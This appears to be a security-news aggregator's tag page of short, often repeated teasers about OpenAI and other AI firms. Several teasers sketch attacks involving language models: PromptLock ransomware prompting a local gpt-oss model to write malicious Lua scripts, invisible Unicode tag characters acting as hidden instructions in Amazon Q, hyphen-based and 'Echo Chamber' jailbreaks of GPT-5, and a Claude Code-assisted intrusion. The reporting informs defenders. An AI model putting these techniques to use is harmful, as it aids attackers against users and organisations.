Tag: openai
-
KI als Cybercrime-Copilot
Tags: ai, business, ciso, cyberattack, cybercrime, dns, group, injection, intelligence, malware, openai, ransomware, RedTeam, sans, strategy, threat, toolDas KI-gestützte Entwickler-Tool Claude Code hat einem Cyberkriminellen dabei geholfen, in Netzwerke einzudringen.CISOs und Sicherheitsentscheider rechnen schon seit längerem damit, dass Cyberangriffe nicht mehr von Menschen mit KI-Tools, sondern von KI-Systemen selbst ausgehen. Diese Befürchtung hat sich nun mit neuen Forschungserkenntnissen bestätigt. So offenbart Anthropics aktueller Threat Intelligence Report , dass das KI-gestützte Entwickler-Tool Claude…
-
KI als Cybercrime-Copilot
Tags: ai, business, ciso, cyberattack, cybercrime, dns, group, injection, intelligence, malware, openai, ransomware, RedTeam, sans, strategy, threat, toolDas KI-gestützte Entwickler-Tool Claude Code hat einem Cyberkriminellen dabei geholfen, in Netzwerke einzudringen.CISOs und Sicherheitsentscheider rechnen schon seit längerem damit, dass Cyberangriffe nicht mehr von Menschen mit KI-Tools, sondern von KI-Systemen selbst ausgehen. Diese Befürchtung hat sich nun mit neuen Forschungserkenntnissen bestätigt. So offenbart Anthropics aktueller Threat Intelligence Report , dass das KI-gestützte Entwickler-Tool Claude…
-
OpenAI is testing “Thinking effort” for ChatGPT
OpenAI is working on a new feature called the Thinking effort picker for ChatGPT. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/artificial-intelligence/openai-is-testing-thinking-effort-for-chatgpt/
-
KI greift erstmals autonom an
Tags: ai, business, ciso, cyberattack, cybercrime, dns, group, injection, intelligence, malware, openai, ransomware, RedTeam, sans, strategy, threat, toolDas KI-gestützte Entwickler-Tool Claude Code hat einem Cyberkriminellen dabei geholfen, in Netzwerke einzudringen.CISOs und Sicherheitsentscheider rechnen schon seit längerem damit, dass Cyberangriffe nicht mehr von Menschen mit KI-Tools, sondern von KI-Systemen selbst ausgehen. Diese Befürchtung hat sich nun mit neuen Forschungserkenntnissen bestätigt. So offenbart Anthropics aktueller Threat Intelligence Report , dass das KI-gestützte Entwickler-Tool Claude…
-
OpenAI, Anthropic Swap Safety Reviews
AI Giants Evaluated Each Other’s Newer Models for Safety Risks. OpenAI and Anthropic evaluated each other’s AI models in the summer, testing for concerning behaviors that could indicate misalignment risks. Both companies released their findings simultaneously: no model was severely problematic, but all showed plenty of troubling behavior in testing scenarios. First seen on govinfosecurity.com…
-
First AI-Powered Ransomware “PromptLock” Uses OpenAI gpt-oss-20b for Encryption
PromptLock, a novel ransomware strain discovered by the ESET Research team, marks the first known instance of malware harnessing a local large language model to generate its malicious payload on the victim’s machine. Rather than carrying pre-compiled attack logic, PromptLock ships with hard-coded prompts that instruct a locally hosted OpenAI gpt-oss:20b model”, accessed via the…
-
Someone Created the First AI-Powered Ransomware Using OpenAI’s gpt-oss:20b Model
Cybersecurity company ESET has disclosed that it discovered an artificial intelligence (AI)-powered ransomware variant codenamed PromptLock.Written in Golang, the newly identified strain uses the gpt-oss:20b model from OpenAI locally via the Ollama API to generate malicious Lua scripts in real-time. The open-weight language model was released by OpenAI earlier this month.”PromptLock First seen on thehackernews.com…
-
Anthropic detects the inevitable: genAI-only attacks, no humans involved
Tags: ai, attack, business, ciso, control, cybercrime, cybersecurity, defense, dns, infrastructure, injection, intelligence, malicious, malware, open-source, openai, RedTeam, threat, tool, warfarenot find.”There is potentially a lot of this activity we’re not seeing. Anthropic being open about their platform being used for malicious activities is significant, and OpenAI has recently shared the same as well. But will others open up about what is already likely happening?” Brunkard asked. “Or maybe they haven’t shared because they don’t…
-
First AI-Powered Ransomware PromptLock Targets Windows, Linux and macOS
ESET has identified PromptLock, the first AI-powered ransomware, using OpenAI models to generate scripts that target Windows, Linux… First seen on hackread.com Jump to article: hackread.com/first-ai-promptlock-ransomware-windows-linux-macos/
-
Someone Created First AI-Powered Ransomware Using OpenAI’s gpt-oss:20b Model
Cybersecurity company ESET has disclosed that it discovered an artificial intelligence (AI)-powered ransomware variant codenamed PromptLock.Written in Golang, the newly identified strain uses the gpt-oss:20b model from OpenAI locally via the Ollama API to generate malicious Lua scripts in real-time. The open-weight language model was released by OpenAI earlier this month.”PromptLock First seen on thehackernews.com…
-
Examining Elon Musk’s xAI Lawsuit against OpenAI, Apple
While the lawsuit alleges anticompetitive practices and market monopolization, the case highlights the complexities of proving such claims. First seen on techtarget.com Jump to article: www.techtarget.com/searchenterpriseai/news/366629910/Examining-Elon-Musks-xAI-Lawsuit-against-OpenAI-Apple
-
AI-Powered Ransomware Has Arrived With ‘PromptLock’
Researchers raise the alarm that a new, rapidly evolving ransomware strain uses an OpenAI model to render and execute malicious code in real time, ushering in a new era of cyberattacks against enterprises. First seen on darkreading.com Jump to article: www.darkreading.com/vulnerabilities-threats/ai-powered-ransomware-promptlock
-
ESET warns of PromptLock, the first AI-driven ransomware
ESET found PromptLock, the first AI-driven ransomware, using OpenAI’s gpt-oss:20b via Ollama to generate and run malicious Lua scripts. In a series of messages published on X, ESET Research announced the discovery of the first known AI-powered ransomware, named PromptLock. The PromptLock malware uses the gpt-oss:20b model from OpenAI locally via the Ollama API to…
-
First AI-powered ransomware spotted, but it’s not active yet
Oh, look, a use case for OpenAI’s gpt-oss-20b model First seen on theregister.com Jump to article: www.theregister.com/2025/08/26/first_aipowered_ransomware_spotted_by/
-
Hackers can slip ghost commands into the Amazon Q Developer VS Code Extension
The model creator won’t fix the flaw: The issue is apparently inherited from Anthropic’s Claude, which powers Amazon Q, and Anthropic will, reportedly, not fix it. “Anthropic models are known to interpret invisible Unicode Tag characters as instructions,” the author said. “This is not something that Anthropic intends to fix, to my knowledge, see this…
-
Lenovo-Chatbot-Lücke wirft Schlaglicht auf KI-Sicherheitsrisiken
Über eine Schwachstelle in Lenovos Chatbot für den Kundensupport ist es Forschern gelungen, Schadcode einzuschleusen.Der Chatbot ‘Lena” von Lenovo basiert auf GPT-4 von OpenAI und wird für den Kundensupport verwendet. Sicherheitsforscher von Cybernews fanden heraus, dass das KI-Tool anfällig für Cross-Site-Scripting-Angriffe (XSS) war. Die Experten haben eine Schwachstelle entdeckt, über die sie schädliche HTML-Inhalte generieren…
-
AI crawlers and fetchers are blowing up websites, with Meta and OpenAI the worst offenders
One fetcher bot seen smacking a website with 39,000 requests per minute First seen on theregister.com Jump to article: www.theregister.com/2025/08/21/ai_crawler_traffic/
-
Microsoft’s Patch Tuesday: 100+ Updates Including Azure OpenAI Service, Memory Corruption Flaw
Microsoft patched CVE-2025-50165, an “extremely high-risk” memory corruption flaw in its graphics component that could let attackers execute code over the network. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-microsoft-patch-tuesday-august-25/
-
OpenAI says GPT-6 is coming and it’ll be better than GPT-5 (obviously)
OpenAI’s CEO Sam Altman told reporters that GPT-6 is already in the works, and it’ll not take as long as GPT-5. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/artificial-intelligence/openai-says-gpt-6-is-coming-and-itll-be-better-than-gpt-5-obviously/
-
OpenAI releases $4 ChatGPT plan, but it’s not available in the US for now
OpenAI has finally announced the GPT Go subscription, which costs just $4 in the US or INR 399 in India. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/artificial-intelligence/openai-releases-4-chatgpt-plan-but-its-not-available-in-the-us-for-now/
-
The AI Memory Wars: Why One System Crushed the Competition (And It’s Not OpenAI)
Most AI agents forget everything very soon. I benchmarked OpenAI Memory, LangMem, MemGPT, and Mem0 in real production environments. One system delivered 26% better accuracy and 91% faster performance. Here’s which memory solution actually works for long-term AI agent deployments. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/08/the-ai-memory-wars-why-one-system-crushed-the-competition-and-its-not-openai/
-
Inside the Jailbreak Methods Beating GPT-5 Safety Guardrails
Experts Say AI Model Makers Are Prioritizing Profit Over Security. Hackers don’t need the deep pockets of a nation-state to break GPT-5, OpenAI’s new flagship model. Analysis from artificial intelligence security researchers finds a few well-placed hyphens are enough to convince the large language model into breaking safeguards against adversarial prompts. First seen on govinfosecurity.com…
-
OpenAI releases warmer GPT-5 personality, but only for non thinking model
Tags: openaiOpenAI has confirmed it has begun rolling out a new warmer personality for GPT-5, but remember that it won’t be as warm as GPT-4o, which is still available for use under legacy models. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/artificial-intelligence/openai-releases-warmer-gpt-5-personality-but-only-for-non-thinking-model/
-
Agentic AI promises a cybersecurity revolution, with asterisks
Tags: ai, api, authentication, ceo, ciso, cloud, control, cybersecurity, data, endpoint, infrastructure, jobs, LLM, open-source, openai, risk, service, soc, software, supply-chain, technology, tool, update, vulnerabilityTrust, transparency, and moving slowly are crucial: Like all technologies, and perhaps more dramatically than most, agentic AI carries both risks and benefits. One obvious risk of AI agents is that, like most LLM models, they will hallucinate or make errors that could cause problems.”If you want to remove or give agency to a platform…
-
Guess what else GPT-5 is bad at? Security
OpenAI and Microsoft have said that GPT-5 is one of their safest and secure models out of the box yet. An AI red-teamer called its performance “terrible.” First seen on cyberscoop.com Jump to article: cyberscoop.com/gpt5-openai-microsoft-security-review/
-
GPT-5 jailbroken hours after launch using ‘Echo Chamber’ and Storytelling exploit
Grok, Gemini, too fell to Echo Chambers : Echo Chamber jailbreak was first disclosed by Neural Trust in June, where researchers reported the technique’s ability to trick leading GPT and Gemini models.The technique, which was shown to exploit the models’ tendency to trust consistency across conversations and ‘echo’ the same malicious idea through multiple conversations, had…
-
So verwundbar sind KI-Agenten
KI-Agenten sind nützlich und gefährlich, wie aktuelle Untersuchungserkenntnisse von Sicherheitsexperten demonstrieren.Large Language Models (LLMs) werden mit immer mehr Tools und Datenquellen verbunden. Das bringt Vorteile, vergrößert aber auch die Angriffsfläche und schafft für Cyberkriminelle neue Prompt-Injection-Möglichkeiten. Das ist bekanntermaßen keine neue Angriffstechnik, erreicht aber mit Agentic AI ein völlig neues Level. Das demonstrierten Research-Spezialisten des…
-
So verwundbar sind KI-Agenten
KI-Agenten sind nützlich und gefährlich, wie aktuelle Untersuchungserkenntnisse von Sicherheitsexperten demonstrieren.Large Language Models (LLMs) werden mit immer mehr Tools und Datenquellen verbunden. Das bringt Vorteile, vergrößert aber auch die Angriffsfläche und schafft für Cyberkriminelle neue Prompt-Injection-Möglichkeiten. Das ist bekanntermaßen keine neue Angriffstechnik, erreicht aber mit Agentic AI ein völlig neues Level. Das demonstrierten Research-Spezialisten des…

